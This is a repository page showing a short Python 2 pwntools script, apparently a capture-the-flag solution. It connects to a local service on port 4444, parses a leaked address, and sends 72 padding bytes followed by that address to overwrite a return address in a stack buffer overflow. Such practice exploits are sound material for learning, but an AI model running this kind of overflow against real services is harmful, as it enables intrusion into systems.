Files
wehub-resource-sync 4e0f4422d0
build-docs / deploy (push) Has been cancelled
Check Markdown links / markdown-link-check (push) Has been cancelled
Pytest / test (3.11) (push) Has been cancelled
Pytest / test (3.12) (push) Has been cancelled
chore: import upstream snapshot with attribution
2026-07-13 13:25:42 +08:00

10 lines
180 B
Python
Executable File

from pwn import *
context.log_level=True
r = remote("localhost",4444)
flag = p64(int(r.recvuntil(">").split(":")[1].strip("\n>"),16))
r.sendline("A"*72+flag)
print r.recvline()